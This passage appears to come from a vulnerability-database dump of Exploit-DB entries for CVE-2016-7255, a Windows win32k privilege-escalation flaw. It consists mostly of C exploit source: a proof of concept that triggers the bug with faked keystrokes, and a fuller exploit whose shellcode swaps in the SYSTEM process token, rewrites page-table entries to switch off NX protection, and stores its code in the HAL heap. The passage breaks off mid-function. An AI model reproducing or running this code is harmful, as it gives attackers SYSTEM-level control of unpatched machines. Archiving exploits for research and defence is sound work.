sizeof(CHAR));\r\n\t\t\r\n\t\tva_start(VaList,Format);\r\n\t\t\r\n\t\t_vsnprintf((CHAR*)pszDbgBuff,1024 - 1,Format,VaList);\r\n\t\t\r\n\t\tDbgPrintEx(77 , 0 , pszDbgBuff );\r\n\t\tOutputDebugStringA(pszDbgBuff);\r\n\t\t\r\n\t\tva_end(VaList);\r\n\t\t\r\n\t} while (FALSE);\r\n\t\r\n\tif (NULL != pszDbgBuff)\r\n\t{\r\n\t\tHeapFree( GetProcessHeap(), 0 , pszDbgBuff );\r\n\t\tpszDbgBuff = NULL;\r\n\t}\r\n\t\r\n\treturn ulRet;\r\n}\r\n\r\n\r\n int _sim_key_down(WORD wKey)\r\n {\r\n\t INPUT stInput = {0};\r\n\t \r\n\t do \r\n\t {\r\n\t\t stInput.type = INPUT_KEYBOARD;\r\n\t\t stInput.ki.wVk = wKey;\r\n\t\t stInput.ki.dwFlags = 0;\r\n\t\t \r\n\t\t SendInput(1 , &stInput , sizeof(stInput) );\r\n\r\n\t } while (FALSE);\r\n\t \r\n\t return 0;\r\n}\r\n\r\n int _sim_key_up(WORD wKey)\r\n {\r\n\t INPUT stInput = {0};\r\n\t \r\n\t do \r\n\t {\r\n\t\t stInput.type = INPUT_KEYBOARD;\r\n\t\t stInput.ki.wVk = wKey;\r\n\t\t stInput.ki.dwFlags = KEYEVENTF_KEYUP;\r\n\t\t \r\n\t\t SendInput(1 , &stInput , sizeof(stInput) );\r\n\t\t \r\n\t } while (FALSE);\r\n\t \r\n\t return 0;\r\n}\r\n\r\n int _sim_alt_shift_esc()\r\n {\r\n\t int i = 0;\r\n\t \r\n\t do \r\n\t {\r\n\t\t _sim_key_down( VK_MENU );\r\n\t\t _sim_key_down( VK_SHIFT );\t \r\n\t\t \r\n\t\t\r\n\t\t_sim_key_down( VK_ESCAPE);\r\n\t\t_sim_key_up( VK_ESCAPE);\r\n\r\n\t\t_sim_key_down( VK_ESCAPE);\r\n\t\t_sim_key_up( VK_ESCAPE);\r\n\t\t\t \r\n\t\t _sim_key_up( VK_MENU );\r\n\t\t _sim_key_up( VK_SHIFT );\t \t \r\n\t\t \r\n\t\t \r\n\t } while (FALSE);\r\n\t \r\n\t return 0;\r\n}\r\n\r\n \r\n\r\n int _sim_alt_shift_tab(int nCount)\r\n {\r\n\t int i = 0;\r\n\t HWND hWnd = NULL;\r\n\r\n\r\n\t int nFinalRet = -1;\r\n\r\n\t do \r\n\t {\r\n\t\t _sim_key_down( VK_MENU );\r\n\t\t _sim_key_down( VK_SHIFT );\t \r\n\r\n\r\n\t\t for ( i = 0; i < nCount ; i++)\r\n\t\t {\r\n\t\t\t _sim_key_down( VK_TAB);\r\n\t\t\t _sim_key_up( VK_TAB);\r\n\t\t\t \r\n\t\t\t Sleep(1000);\r\n\r\n\t\t }\r\n\t\r\n\t\t \r\n\t\t_sim_key_up( VK_MENU );\r\n\t\t _sim_key_up( VK_SHIFT );\t \r\n\t } while (FALSE);\r\n\t \r\n\t return nFinalRet;\r\n}\r\n\r\n\r\n\r\nint or_address_value_4(__in void* pAddress)\r\n{\r\n\tWNDCLASSEXW stWC = {0};\r\n\r\n\tHWND\thWndParent = NULL;\r\n\tHWND\thWndChild = NULL;\r\n\r\n\tWCHAR*\tpszClassName = L\"cve-2016-7255\";\r\n\tWCHAR*\tpszTitleName = L\"cve-2016-7255\";\r\n\r\n\tvoid*\tpId = NULL;\r\n\tMSG\t\tstMsg = {0};\r\n\r\n\tdo \r\n\t{\r\n\r\n\t\tstWC.cbSize = sizeof(stWC);\r\n\t\tstWC.lpfnWndProc = DefWindowProcW;\r\n\t\tstWC.lpszClassName = pszClassName;\r\n\t\t\r\n\t\tif ( 0 == RegisterClassExW(&stWC) )\r\n\t\t{\r\n\t\t\tbreak;\r\n\t\t}\r\n\r\n\t\thWndParent = CreateWindowExW(\r\n\t\t\t0,\r\n\t\t\tpszClassName,\r\n\t\t\tNULL,\r\n\t\t\tWS_OVERLAPPEDWINDOW|WS_VISIBLE,\r\n\t\t\t0,\r\n\t\t\t0,\r\n\t\t\t360,\r\n\t\t\t360,\r\n\t\t\tNULL,\r\n\t\t\tNULL,\r\n\t\t\tGetModuleHandleW(NULL),\r\n\t\t\tNULL\r\n\t\t);\r\n\r\n\t\tif (NULL == hWndParent)\r\n\t\t{\r\n\t\t\tbreak;\r\n\t\t}\r\n\r\n\t\thWndChild = CreateWindowExW(\r\n\t\t\t0,\r\n\t\t\tpszClassName,\r\n\t\t\tpszTitleName,\r\n\t\t\tWS_OVERLAPPEDWINDOW|WS_VISIBLE|WS_CHILD,\r\n\t\t\t0,\r\n\t\t\t0,\r\n\t\t\t160,\r\n\t\t\t160,\r\n\t\t\thWndParent,\r\n\t\t\tNULL,\r\n\t\t\tGetModuleHandleW(NULL),\r\n\t\t\tNULL\r\n\t\t);\r\n\t\t\r\n\t\tif (NULL == hWndChild)\r\n\t\t{\r\n\t\t\tbreak;\r\n\t\t}\r\n\r\n\t\t#ifdef _WIN64\r\n\t\t\tpId = ( (UCHAR*)pAddress - 0x28 ); \r\n\t\t#else\r\n\t\t\tpId = ( (UCHAR*)pAddress - 0x14); \r\n\t\t#endif // #ifdef _WIN64\r\n\t\t\r\n\t\tSetWindowLongPtr(hWndChild , GWLP_ID , (LONG_PTR)pId );\r\n\r\n\t\tDbgPrint(\"hWndChild = 0x%p\\n\" , hWndChild);\r\n\t\tDebugBreak();\r\n\r\n\t\tShowWindow(hWndParent , SW_SHOWNORMAL);\r\n\r\n\t\tSetParent(hWndChild , GetDesktopWindow() );\r\n\r\n\t\tSetForegroundWindow(hWndChild);\r\n\r\n\t\t_sim_alt_shift_tab(4);\r\n\t\t\r\n\t\tSwitchToThisWindow(hWndChild , TRUE);\r\n\t\t\r\n\t\t_sim_alt_shift_esc();\r\n\r\n\r\n\t\twhile( GetMessage(&stMsg , NULL , 0 , 0) )\r\n\t\t{\t\r\n\t\t\tTranslateMessage(&stMsg);\r\n\t\t\tDispatchMessage(&stMsg);\r\n\t\t}\r\n\t\r\n\r\n\t} while (FALSE);\r\n\r\n\tif ( NULL != hWndParent )\r\n\t{\r\n\t\tDestroyWindow(hWndParent);\r\n\t\thWndParent = NULL;\r\n\t}\r\n\r\n\tif ( NULL != hWndChild )\r\n\t{\r\n\t\tDestroyWindow(hWndChild);\r\n\t\thWndChild = NULL;\r\n\t}\r\n\r\n\tUnregisterClassW(pszClassName , GetModuleHandleW(NULL) );\r\n\r\n\treturn 0;\r\n}\r\n\r\nint __cdecl wmain(int nArgc, WCHAR** Argv)\r\n{\r\n\tdo \r\n\t{\r\n\t\tor_address_value_4( (void*)0xFFFFFFFF );\r\n\t} while (FALSE);\r\n\t\r\n\treturn 0;\r\n}\r\n\r\n", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://www.exploit-db.com/download/40745/"}, {"lastseen": "2017-01-11T17:58:55", "description": "Microsoft Windows Kernel - 'win32k.sys' 'NtSetWindowLongPtr' Privilege Escalation (MS16-135) (2). CVE-2016-7255. Local exploit for Windows platform", "published": "2017-01-08T00:00:00", "type": "exploitdb", "title": "Microsoft Windows Kernel - 'win32k.sys' 'NtSetWindowLongPtr' Privilege Escalation (MS16-135) (2)", "bulletinFamily": "exploit", "cvelist": ["CVE-2016-7255"], "modified": "2017-01-08T00:00:00", "id": "EDB-ID:41015", "href": "https://www.exploit-db.com/exploits/41015/", "sourceData": "/*\r\nSource: https://ricklarabee.blogspot.com/2017/01/virtual-memory-page-tables-and-one-bit.html\r\n\r\nBinary: https://github.com/rlarabee/exploits/raw/8b9eb646516d7f022a010f28018209f331c28975/cve-2016-7255/compiled/cve-2016-7255.exe\r\nMirror: https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/41015.exe\r\n*/\r\n\r\n// ricklarabee.blogspot.com\r\n\r\n//This program is free software; you can redistribute it and/or\r\n//modify it under the terms of the GNU General Public License\r\n//as published by the Free Software Foundation.\r\n\r\n//This program is distributed in the hope that it will be useful,\r\n//but WITHOUT ANY WARRANTY; without even the implied warranty of\r\n//MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.See the\r\n//GNU General Public License for more details.\r\n\r\n//You should have received a copy of the GNU General Public License\r\n//along with this program; if not, write to the Free Software\r\n//Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301, USA.\r\n\r\n// Credits: enrique.nissim@IOActive.com: https://github.com/IOActive/I-know-where-your-page-lives/tree/master/code/CVE-2016-7255\r\n// PoC from https://github.com/tinysec/public/tree/master/CVE-2016-7255\r\n\r\n#include <windows.h>\r\n#include <wchar.h>\r\n#include <stdlib.h>\r\n#include <stdio.h>\r\n\r\n#pragma comment(lib,\"ntdll.lib\")\r\n#pragma comment(lib,\"user32.lib\")\r\n#pragma comment(lib, \"advapi32\")\r\n\r\nUINT64 PML4_BASE;\r\nUINT PML4_SELF_REF_INDEX;\r\nUINT64 PML4_SELF_REF = 0xFFFFF6FB7DBEDF68;\r\n\r\n#define STATUS_SUCCESS ((NTSTATUS)0x00000000L)\r\n#define STATUS_UNSUCCESSFUL ((NTSTATUS)0xC0000001L)\r\n#define GET_INDEX(va) ( ((va >> 39) & 0x1ff )) \r\n\r\n////////////////////////////////////////////////////////\r\n// Define Data Types\r\n////////////////////////////////////////////////////////\r\ntypedef struct _SYSTEM_MODULE_INFORMATION_ENTRY {\r\n PVOID Unknown1;\r\n PVOID Unknown2;\r\n PVOID Base;\r\n ULONG Size;\r\n ULONG Flags;\r\n USHORT Index;\r\n USHORT NameLength;\r\n USHORT LoadCount;\r\n USHORT PathLength;\r\n CHAR ImageName[256];\r\n} SYSTEM_MODULE_INFORMATION_ENTRY, *PSYSTEM_MODULE_INFORMATION_ENTRY;\r\n\r\ntypedef struct _SYSTEM_MODULE_INFORMATION {\r\n ULONG Count;\r\n SYSTEM_MODULE_INFORMATION_ENTRY Module[1];\r\n} SYSTEM_MODULE_INFORMATION, *PSYSTEM_MODULE_INFORMATION;\r\n\r\ntypedef enum _SYSTEM_INFORMATION_CLASS { \r\n SystemModuleInformation = 11,\r\n SystemHandleInformation = 16\r\n} SYSTEM_INFORMATION_CLASS;\r\n\r\ntypedef NTSTATUS (WINAPI *NtQuerySystemInformation_t)(IN SYSTEM_INFORMATION_CLASS SystemInformationClass,\r\n OUT PVOID SystemInformation,\r\n IN ULONG SystemInformationLength,\r\n OUT PULONG ReturnLength);\r\n\r\ntypedef NTSTATUS (WINAPI *NtQueryIntervalProfile_t)(IN ULONG ProfileSource,\r\n\t\t\t\t\t\t\t\t\t\t\t\t\tOUT PULONG Interval);\r\n\r\nNtQuerySystemInformation_t NtQuerySystemInformation;\r\nNtQueryIntervalProfile_t NtQueryIntervalProfile;\r\n \r\nchar shellcode[] = {\r\n\t//0xcc,\r\n\t0xfa, \t\t\t\t\t\t\t\t\t\t\t\t\t\t\t// CLI\r\n\t0x9c, \t\t\t\t\t\t\t\t\t\t\t\t\t\t\t// PUSHFQ\r\n\t0x48, 0xb8, 0x90, 0x90, 0x90 ,0x90 ,0x90, 0x90, 0x90, 0x90, \t// MOV RAX, Original Pointer\r\n\t0x50, \t\t\t\t\t\t\t\t\t\t\t\t\t\t\t// PUSH RAX\r\n\t0x51, \t\t\t\t\t\t\t\t\t\t\t\t\t\t\t// PUSH RCX\r\n\t0x48, 0xb9, 0x90, 0x90, 0x90 ,0x90 ,0x90, 0x90, 0x90, 0x90, \t// MOV RCX, [OverwriteAddr+OverwriteOffset]\r\n\t0x48, 0x89, 0x01, \t\t\t\t\t\t\t\t\t\t\t\t// MOV QWORD PTR [RCX], RAX\r\n\t0xb9, 0x90, 0x90, 0x90, 0x90, \t\t\t\t\t\t\t\t\t// MOV ECX, PID\r\n\t0x53, \t\t\t\t\t\t\t\t\t\t\t\t\t\t\t// PUSH RBX\r\n\r\n\t0x65, 0x48, 0x8B, 0x04, 0x25, 0x88, 0x01, 0x00, 0x00, \t\t\t// MOV RAX,QWORD PTR gs:0x188\r\n\t0x48, 0x8B, 0x80, 0xB8, 0x00, 0x00, 0x00,\t\t\t\t\t\t// MOV RAX,QWORD PTR [RAX+0xb8] EPROCESS\r\n\t0x48, 0x8d, 0x80, 0x90, 0x90, 0x00, 0x00,\t\t\t\t\t\t// LEA RAX,[RAX+0xActiveProcessLinkOffset] \r\n\t//<tag>\r\n\t0x48, 0x8b, 0x00,\t\t\t\t\t\t\t\t\t\t\t\t// MOV RAX,QWORD PTR [RAX]\r\n\t0x48, 0x8b, 0x58, 0xf8,\t\t\t\t\t\t\t\t\t\t\t// MOV RBX,QWORD PTR [RAX-0x8] // UniqueProcessID\r\n\t0x48, 0x83, 0xfb, 0x04,\t\t\t\t\t\t\t\t\t\t\t// CMP RBX,0x4\r\n\t0x75, 0xf3,\t\t\t\t\t\t\t\t\t\t\t\t\t\t// JNE <tag>\r\n\t0x48, 0x8b, 0x98, 0x90, 0x90, 0x90, 0x90,\t\t\t\t\t\t// MOV RBX, QWORD PTR [RAX+0x60] // GET TOKEN of SYSTEM\r\n\r\n\t0x53, \t\t\t\t\t\t\t\t\t\t\t\t\t\t\t// PUSH RBX\r\n\t//<tag2>\r\n\t0x48, 0x8b, 0x00,\t\t\t\t\t\t\t\t\t\t\t\t// MOV RAX,QWORD PTR [RAX]\r\n\t0x48, 0x8b, 0x58, 0xf8,\t\t\t\t\t\t\t\t\t\t\t// MOV RBX,QWORD PTR [RAX-0x8] // UniqueProcessID\r\n\t0x39, 0xcb,\t\t\t\t\t\t\t\t\t\t\t\t\t\t// CMP EBX, ECX // our PID\r\n\t0x75, 0xf5,\t\t\t\t\t\t\t\t\t\t\t\t\t\t// JNE <tag2>\r\n\t0x5b, \t\t\t\t\t\t\t\t\t\t\t\t\t\t\t// POP RBX\r\n\t0x48, 0x89, 0x98, 0x90, 0x90, 0x90, 0x90,\t\t\t\t\t\t// MOV QWORD PTR[RAX + 0x60], RBX\r\n\r\n\t0x5b, // POP RBX\r\n\t0x59, // POP RCX\r\n\t0x58, // POP RAX\r\n\t0x9d, // POPFQ\r\n\r\n\t0xfb, // STI\r\n\t0xff, 0xe0 // JMP RAX\r\n};\r\n\r\nULONG __cdecl DbgPrint(__in char* Format, ...)\r\n{\r\n\tCHAR* pszDbgBuff = NULL;\r\n\tva_list VaList = NULL;\r\n\tULONG ulRet = 0;\r\n\r\n\tdo\r\n\t{\r\n\t\tpszDbgBuff = (CHAR*)HeapAlloc(GetProcessHeap(), 0, 1024 * sizeof(CHAR));\r\n\t\tif (NULL == pszDbgBuff)\r\n\t\t{\r\n\t\t\tbreak;\r\n\t\t}\r\n\t\tRtlZeroMemory(pszDbgBuff, 1024 * sizeof(CHAR));\r\n\r\n\t\tva_start(VaList, Format);\r\n\r\n\t\t_vsnprintf((CHAR*)pszDbgBuff, 1024 - 1, Format, VaList);\r\n\r\n\r\n\t\tOutputDebugStringA(pszDbgBuff);\r\n\r\n\t\tva_end(VaList);\r\n\r\n\t} while (FALSE);\r\n\r\n\tif (NULL != pszDbgBuff)\r\n\t{\r\n\t\tHeapFree(GetProcessHeap(), 0, pszDbgBuff);\r\n\t\tpszDbgBuff = NULL;\r\n\t}\r\n\r\n\treturn ulRet;\r\n}\r\n\r\n\r\nint _sim_key_down(WORD wKey)\r\n{\r\n\tINPUT stInput = { 0 };\r\n\r\n\tdo\r\n\t{\r\n\t\tstInput.type = INPUT_KEYBOARD;\r\n\t\tstInput.ki.wVk = wKey;\r\n\t\tstInput.ki.dwFlags = 0;\r\n\r\n\t\tSendInput(1, &stInput, sizeof(stInput));\r\n\r\n\t} while (FALSE);\r\n\r\n\treturn 0;\r\n}\r\n\r\nint _sim_key_up(WORD wKey)\r\n{\r\n\tINPUT stInput = { 0 };\r\n\r\n\tdo\r\n\t{\r\n\t\tstInput.type = INPUT_KEYBOARD;\r\n\t\tstInput.ki.wVk = wKey;\r\n\t\tstInput.ki.dwFlags = KEYEVENTF_KEYUP;\r\n\r\n\t\tSendInput(1, &stInput, sizeof(stInput));\r\n\r\n\t} while (FALSE);\r\n\r\n\treturn 0;\r\n}\r\n\r\nint _sim_alt_shift_esc()\r\n{\r\n\tint i = 0;\r\n\r\n\tdo\r\n\t{\r\n\t\t_sim_key_down(VK_MENU);\r\n\t\t_sim_key_down(VK_SHIFT);\r\n\r\n\r\n\t\t_sim_key_down(VK_ESCAPE);\r\n\t\t_sim_key_up(VK_ESCAPE);\r\n\r\n\t\t_sim_key_down(VK_ESCAPE);\r\n\t\t_sim_key_up(VK_ESCAPE);\r\n\r\n\t\t_sim_key_up(VK_MENU);\r\n\t\t_sim_key_up(VK_SHIFT);\r\n\r\n\r\n\t} while (FALSE);\r\n\r\n\treturn 0;\r\n}\r\n\r\n\r\n\r\nint _sim_alt_shift_tab(int nCount)\r\n{\r\n\tint i = 0;\r\n\tHWND hWnd = NULL;\r\n\r\n\r\n\tint nFinalRet = -1;\r\n\r\n\tdo\r\n\t{\r\n\t\t_sim_key_down(VK_MENU);\r\n\t\t_sim_key_down(VK_SHIFT);\r\n\r\n\r\n\t\tfor (i = 0; i < nCount; i++)\r\n\t\t{\r\n\t\t\t_sim_key_down(VK_TAB);\r\n\t\t\t_sim_key_up(VK_TAB);\r\n\r\n\t\t\tSleep(1000);\r\n\r\n\t\t}\r\n\r\n\r\n\t\t_sim_key_up(VK_MENU);\r\n\t\t_sim_key_up(VK_SHIFT);\r\n\t} while (FALSE);\r\n\r\n\treturn nFinalRet;\r\n}\r\n\r\nint _sim_alt_esc(int count)\r\n{\r\n\tint i = 0;\r\n\r\n\tfor (i = 0; i<count; i++)\r\n\t{\r\n\t\t_sim_key_down(VK_MENU);\r\n\t\t//_sim_key_down(VK_SHIFT);\r\n\r\n\r\n\t\t_sim_key_down(VK_ESCAPE);\r\n\t\t_sim_key_up(VK_ESCAPE);\r\n\r\n\t\t_sim_key_down(VK_ESCAPE);\r\n\t\t_sim_key_up(VK_ESCAPE);\r\n\r\n\t\t_sim_key_up(VK_MENU);\r\n\t\t//_sim_key_up(VK_SHIFT);\r\n\r\n\t}\r\n\r\n\treturn 0;\r\n}\r\n\r\n\r\nint or_address_value_4(__in void* pAddress)\r\n{\r\n\tWNDCLASSEXW stWC = { 0 };\r\n\r\n\tHWND hWndParent = NULL;\r\n\tHWND hWndChild = NULL;\r\n\r\n\tWCHAR* pszClassName = L\"cve-2016-7255\";\r\n\tWCHAR* pszTitleName = L\"cve-2016-7255\";\r\n\r\n\tvoid* pId = NULL;\r\n\tMSG stMsg = { 0 };\r\n\r\n\tUINT64 value = 0;\r\n\r\n\tdo\r\n\t{\r\n\r\n\t\tstWC.cbSize = sizeof(stWC);\r\n\t\tstWC.lpfnWndProc = DefWindowProcW;\r\n\t\tstWC.lpszClassName = pszClassName;\r\n\r\n\t\tif (0 == RegisterClassExW(&stWC))\r\n\t\t{\r\n\t\t\tbreak;\r\n\t\t}\r\n\r\n\t\thWndParent = CreateWindowExW(\r\n\t\t\t0,\r\n\t\t\tpszClassName,\r\n\t\t\tNULL,\r\n\t\t\tWS_OVERLAPPEDWINDOW | WS_VISIBLE,\r\n\t\t\t0,\r\n\t\t\t0,\r\n\t\t\t360,\r\n\t\t\t360,\r\n\t\t\tNULL,\r\n\t\t\tNULL,\r\n\t\t\tGetModuleHandleW(NULL),\r\n\t\t\tNULL\r\n\t\t);\r\n\r\n\t\tif (NULL == hWndParent)\r\n\t\t{\r\n\t\t\tbreak;\r\n\t\t}\r\n\r\n\t\thWndChild = CreateWindowExW(\r\n\t\t\t0,\r\n\t\t\tpszClassName,\r\n\t\t\tpszTitleName,\r\n\t\t\tWS_OVERLAPPEDWINDOW | WS_VISIBLE | WS_CHILD,\r\n\t\t\t0,\r\n\t\t\t0,\r\n\t\t\t160,\r\n\t\t\t160,\r\n\t\t\thWndParent,\r\n\t\t\tNULL,\r\n\t\t\tGetModuleHandleW(NULL),\r\n\t\t\tNULL\r\n\t\t);\r\n\r\n\t\tif (NULL == hWndChild)\r\n\t\t{\r\n\t\t\tbreak;\r\n\t\t}\r\n\r\n#ifdef _WIN64\r\n\t\tpId = ((UCHAR*)pAddress - 0x28);\r\n#else\r\n\t\tpId = ((UCHAR*)pAddress - 0x14);\r\n#endif // #ifdef _WIN64\r\n\r\n\t\tSetWindowLongPtr(hWndChild, GWLP_ID, (LONG_PTR)pId);\r\n\r\n\t\tDbgPrint(\"hWndChild = 0x%p\\n\", hWndChild);\r\n\r\n\t\tShowWindow(hWndParent, SW_SHOWNORMAL);\r\n\r\n\t\tSetParent(hWndChild, GetDesktopWindow());\r\n\r\n\t\tSetForegroundWindow(hWndChild);\r\n\r\n\t\t_sim_alt_shift_tab(4);\r\n\r\n\t\tSwitchToThisWindow(hWndChild, TRUE);\r\n\r\n\t\t_sim_alt_shift_esc();\r\n\r\n\t\twhile (GetMessage(&stMsg, NULL, 0, 0)) {\r\n\t\t\t\r\n\t\t\tSetFocus(hWndParent);\r\n\t\t\t_sim_alt_esc(20);\r\n\t\t\tSetFocus(hWndChild);\r\n\t\t\t_sim_alt_esc(20);\r\n\r\n\t\t\tTranslateMessage(&stMsg);\r\n\t\t\tDispatchMessage(&stMsg);\r\n\t\t\t\r\n\t\t\tif (value != 0) {\r\n\t\t\t\tbreak;\r\n\t\t\t}\r\n\t\t\t\r\n\r\n\t\t\t__try {\r\n\t\t\t\tvalue = *(UINT64 *)PML4_SELF_REF;\r\n\t\t\t\tif ((value & 0x67) == 0x67) {\r\n\t\t\t\t\tprintf(\"Value Self Ref = %llx\\n\", value);\r\n\t\t\t\t\tbreak;\r\n\t\t\t\t}\r\n\t\t\t}\r\n\t\t\t__except (EXCEPTION_EXECUTE_HANDLER) {\r\n\t\t\t\tcontinue;\r\n\t\t\t}\r\n\r\n\t\t}\r\n\r\n\r\n\t} while (FALSE);\r\n\r\n\tif (NULL != hWndParent)\r\n\t{\r\n\t\tDestroyWindow(hWndParent);\r\n\t\thWndParent = NULL;\r\n\t}\r\n\r\n\tif (NULL != hWndChild)\r\n\t{\r\n\t\tDestroyWindow(hWndChild);\r\n\t\thWndChild = NULL;\r\n\t}\r\n\r\n\tUnregisterClassW(pszClassName, GetModuleHandleW(NULL));\r\n\r\n\treturn 0;\r\n}\r\n\r\nUINT64 get_pxe_address(UINT64 address) {\r\n\tUINT entry = PML4_SELF_REF_INDEX;\r\n\tUINT64 result = address >> 9;\r\n\tUINT64 lower_boundary = ((UINT64)0xFFFF << 48) | ((UINT64)entry << 39);\r\n\tUINT64 upper_boundary = (((UINT64)0xFFFF << 48) | ((UINT64)entry << 39) + 0x8000000000 - 1) & 0xFFFFFFFFFFFFFFF8;\r\n\tresult = result | lower_boundary;\r\n\tresult = result & upper_boundary;\r\n\treturn result;\r\n}\r\n\r\nUINT64 look_free_entry_pml4(void) {\r\n\t// Looks for a free pml4e in the last 0x100 bytes of the PML4\r\n\tint offset = 0xF00;\r\n\tUINT64 pml4_search = PML4_BASE + offset;\r\n\twhile (offset < 0xFF8)\r\n\t{\r\n\t\tif ((*(PVOID *)pml4_search) == 0x0)\r\n\t\t{\r\n\t\t\t// This is a NULL (free) entry\r\n\t\t\tbreak;\r\n\t\t}\r\n\t\toffset += 8;\r\n\t\tpml4_search = PML4_BASE + offset;\r\n\t}\r\n\treturn pml4_search;\r\n}\r\n\r\nUINT64 calculate_spurious_pt_address(UINT64 spurious_offset) {\r\n\tUINT64 index = (spurious_offset & 0xFFF) / 8;\r\n\tUINT64 result = (\r\n\t\t((UINT64)0xFFFF << 48) |\r\n\t\t((UINT64)PML4_SELF_REF_INDEX << 39) |\r\n\t\t((UINT64)PML4_SELF_REF_INDEX << 30) |\r\n\t\t((UINT64)PML4_SELF_REF_INDEX << 21) |\r\n\t\t(index << 12)\r\n\t\t);\r\n\treturn result;\r\n}\r\n\r\n\r\n\r\nUINT64 create_spurious_pte_to_virtual_address(UINT64 virtual_address, BOOL patch_original) {\r\n\r\n\t/*\r\n\t1: kd> !pte ffffffff`ffd00000\r\n\tVA ffffffffffd00000\r\n\tPXE at FFFFF6FB7DBEDFF8 PPE at FFFFF6FB7DBFFFF8 PDE at FFFFF6FB7FFFFFF0 PTE at FFFFF6FFFFFFE800\r\n\tcontains 0000000000A1F063 contains 0000000000A20063 contains 0000000000A25063 contains 8000000000103963\r\n\tpfn a1f-- - DA--KWEV pfn a20-- - DA--KWEV pfn a25-- - DA--KWEV pfn 103 - G - DA--KW - V\r\n\t*/\t\r\n\r\n\tUINT64 pte = get_pxe_address(virtual_address);\r\n\tint pte_offset = pte & 0xFFF;\r\n\t//printf(\"PTE: %llx, %x\\n\", pte, pte_offset);\r\n\t\r\n\tUINT64 pde = get_pxe_address(pte);\r\n\tint pde_offset = pde & 0xFFF;\r\n\t//printf(\"PDE: %llx, %x\\n\", pde, pde_offset);\r\n\t\t\r\n\tUINT64 pdpte = get_pxe_address(pde);\r\n\tint pdpte_offset = pdpte & 0xFFF;\r\n\t//printf(\"PDPTE: %llx,%x\\n\", pdpte, pdpte_offset);\r\n\t\t\r\n\tUINT64 pml4e = get_pxe_address(pdpte);\r\n\tint pml4e_offset = pml4e & 0xFFF;\r\n\t//printf(\"PML4E: %llx\\n\", pml4e, pml4e_offset);\r\n\t\r\n\tUINT64 spurious_offset = look_free_entry_pml4();\r\n\tprintf(\"[+] Selected spurious PML4E: %llx\\n\", spurious_offset);\r\n\tUINT64 f_e_pml4 = spurious_offset;\r\n\tUINT64 spurious_pt = calculate_spurious_pt_address(spurious_offset);\r\n\tprintf(\"[+] Spurious PT: %llx\\n\", spurious_pt);\r\n\tprintf(\"--------------------------------------------------\\n\\n\");\r\n\t\r\n\t\r\n\t//Read the physical address of pml4e\t\r\n\tUINT64 pml4e_pfn = (UINT64)(*(PVOID *)pml4e);\r\n\tprintf(\"[+] Content pml4e %llx: %llx\\n\", pml4e, pml4e_pfn);\r\n\t// Change the PxE\r\n\tpml4e_pfn = pml4e_pfn | 0x67; // Set U/S\r\n\t\r\n\tprintf(\"[+] Patching the Spurious Offset (PML4e) %llx: %llx\\n\",f_e_pml4, pml4e_pfn);\r\n\t*((PVOID *)spurious_offset) = (PVOID)pml4e_pfn;\r\n\tSleep(0x1); // Sleep for TLB refresh;\r\n\t\r\n\t//Read the physical address of pdpte\r\n\tUINT64 pdpte_pfn = (UINT64) *(PVOID *)(spurious_pt + pdpte_offset);\r\n\tprintf(\"[+] Content pdpte %llx: %llx\\n\", pdpte, pdpte_pfn);\r\n\t// Change the PxE\r\n\tpdpte_pfn = pdpte_pfn | 0x67; // Set U/S\r\n\tprintf(\"[+] Patching the Spurious Offset (PDPTE) %llx: %llx\\n\", spurious_offset, pdpte_pfn);\r\n\t*((PVOID *)spurious_offset) = (PVOID)pdpte_pfn;\r\n\tSleep(0x1); // Sleep for TLB refresh;\r\n\t\r\n\t//Read the physical address of pde\r\n\tUINT64 pde_addr = spurious_pt + pde_offset;\r\n\tUINT64 pde_pfn = (UINT64) *(PVOID *)(spurious_pt + pde_offset);\r\n\tprintf(\"[+] Content pdpe %llx: %llx\\n\", pde, pde_pfn);\r\n\t// Change the PxE\r\n\tpde_pfn = pde_pfn | 0x67; // Set U/S\r\n\tprintf(\"[+] Patching the Spurious Offset (PDE) %llx: %llx\\n\", spurious_offset, pde_pfn);\r\n\t*((PVOID *)spurious_offset) = (PVOID)pde_pfn;\r\n\tSleep(0x1); // Sleep for TLB refresh;\r\n\t\r\n\t//Read the physical address of pte\r\n\tUINT64 pte_addr = spurious_pt + pte_offset;\r\n\tUINT64 pte_pfn = (UINT64) *(PVOID *)(spurious_pt + pte_offset);\r\n\tprintf(\"[+] Content pte %llx: %llx\\n\", pte, pte_pfn);\r\n\t// Change the PxE\r\n\tpte_pfn = pte_pfn | 0x67; // Set U/S\r\n pte_pfn = pte_pfn & 0x7fffffffffffffff; // Turn off NX \r\n\tif (patch_original) {\r\n\t\tprintf(\"*** Patching the original location to enable NX...\\n\");\r\n\t\t*(PVOID *)(spurious_pt + pte_offset) = (PVOID)pte_pfn;\r\n\t}\r\n \r\n\tprintf(\"[+] Patching the Spurious Offset (PTE) %llx: %llx\\n\", spurious_offset, pte_pfn);\r\n\t*((PVOID *)spurious_offset) = (PVOID)pte_pfn;\r\n\tSleep(0x1); // Sleep for TLB refresh;\r\n\tprintf(\"\\n\\n\");\r\n\treturn spurious_pt;\r\n}\r\n\r\nUINT64 get_OverwriteAddress_pointer(UINT64 target_address, int target_offset) {\r\n\tprintf(\"[*] Getting Overwrite pointer: %llx\\n\", target_address);\r\n\tUINT64 OverwriteAddress = create_spurious_pte_to_virtual_address(target_address, FALSE);\r\n\tOverwriteAddress += (target_address & 0xFFF);\r\n\tprintf(\"OverwriteAddress: %llx\\n\", OverwriteAddress);\r\n\treturn (UINT64) *((PVOID *)(((char *)OverwriteAddress) + target_offset));\r\n}\r\n\r\nvoid overwrite_TargetAddress(UINT64 hook_address, UINT64 target_address, int target_offset) {\r\n\tUINT64 OverwriteTarget = create_spurious_pte_to_virtual_address(target_address, FALSE);\r\n\tOverwriteTarget += (target_address & 0xFFF);\r\n\tUINT64 target = (UINT64)((char *)OverwriteTarget) + target_offset;\r\n\tprintf(\"Patch OverwriteTarget: %llx with %llx\\n\", target, hook_address);\r\n\t*(PVOID *)target = (PVOID)hook_address;\r\n}\r\n\r\n\r\nUINT64 store_shellcode_in_hal(void) {\r\n\t//// Finally store the shellcode on the HAL\r\n\r\n\tUINT64 hal_heap_addr = 0xFFFFFFFFFFD00000;\r\n\tUINT64 hal_heap = create_spurious_pte_to_virtual_address(hal_heap_addr, TRUE);\r\n\r\n\tprintf(\"HAL address: %llx\\n\", hal_heap);\r\n\t// 0xffffffffffd00d50 this is a good offset to store shellcode 